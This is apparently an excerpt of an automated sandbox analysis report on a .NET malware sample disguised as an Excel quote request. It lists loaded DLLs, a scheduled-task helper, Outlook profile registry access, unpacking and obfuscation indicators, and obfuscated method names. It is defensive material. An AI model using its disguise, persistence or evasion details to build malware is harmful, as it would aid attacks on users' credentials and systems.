Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
Source: Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Form1.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: YzkHZRBcm.exe.0.dr, Form1.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs .Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs .Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3374a04.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7c80000.5.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs .Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_031DF508 push esp; iretd 0_2_031DF539
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC8541 pushad ; retf 0_2_07DC854D
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC84E9 push esp; retf 0_2_07DC84F5
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133900B push edx; retf 9_2_01339012
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339093 push ebp; retf 9_2_01339462
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339091 push ebx; retf 9_2_01339092
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339089 push ebx; retf 9_2_0133908A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133A088 pushad ; retf 9_2_0133A0EA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133A0EB pushad ; retf 9_2_0133A0F2
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133A0E8 pushad ; retf 9_2_0133A0EA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339468 push esi; retf 9_2_0133961A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01338490 push edx; retf 9_2_01338EEA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01338481 push ecx; retf 9_2_01338482
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339611 push edi; retf 9_2_01339612
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01339DE0 pushad ; retf 9_2_0133A02A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01338EEB push edx; retf 9_2_01338EF2
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_0102F463 push esp; iretd 10_2_0102F539
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_051E9F40 push eax; mov dword ptr [esp], edx 10_2_051E9F54
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B7750 push esp; retf 10_2_071B775D
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B77A9 pushad ; retf 10_2_071B77B5
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B9C30 push esp; retf 0150h 14_2_012B9D55
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: section name: .text entropy: 7.986844435005259
Source: YzkHZRBcm.exe.0.dr Static PE information: section name: .text entropy: 7.986844435005259
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, fb6yvpsy14g5qhnfk0.cs High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rtPNF2YwxlfdEVDxrl.cs High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, W5VmDo6HmpAgbNZEiu.cs High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, mJTKhIVc7qJwtjTabI.cs High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.cs High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, NfalMhJ8uA3kaHXvgn.cs High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, IjoMYfSa29sGRgq0j8.cs High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, x64ZxoKhudRg3sF6Kl.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, lq3FlorROTtpd8nMyY.cs High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, j7LYTtwUmq2kSe3mU3.cs High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, ns7of4m4T22kQcU5Nm.cs High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, jO0gAth6LXQ4IqyJvc.cs High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zCNwJdFnQu4puUFchct.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, n6TEH8zCDlVl4HvvYO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rC3oiK5rTtspMSI9J1.cs High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, kG4rDQDRSR9x8fka51.cs High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zOP9a9BGA3on5uXvvo.cs High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, oGQm8v3wF9JwNXXwVH.cs High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, nUhYvTMom9nagO8Sow.cs High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, fb6yvpsy14g5qhnfk0.cs High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rtPNF2YwxlfdEVDxrl.cs High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, W5VmDo6HmpAgbNZEiu.cs High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, mJTKhIVc7qJwtjTabI.cs High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.cs High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, NfalMhJ8uA3kaHXvgn.cs High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, IjoMYfSa29sGRgq0j8.cs High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, x64ZxoKhudRg3sF6Kl.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, lq3FlorROTtpd8nMyY.cs High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, j7LYTtwUmq2kSe3mU3.cs High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, ns7of4m4T22kQcU5Nm.cs High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, jO0gAth6LXQ4IqyJvc.cs High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
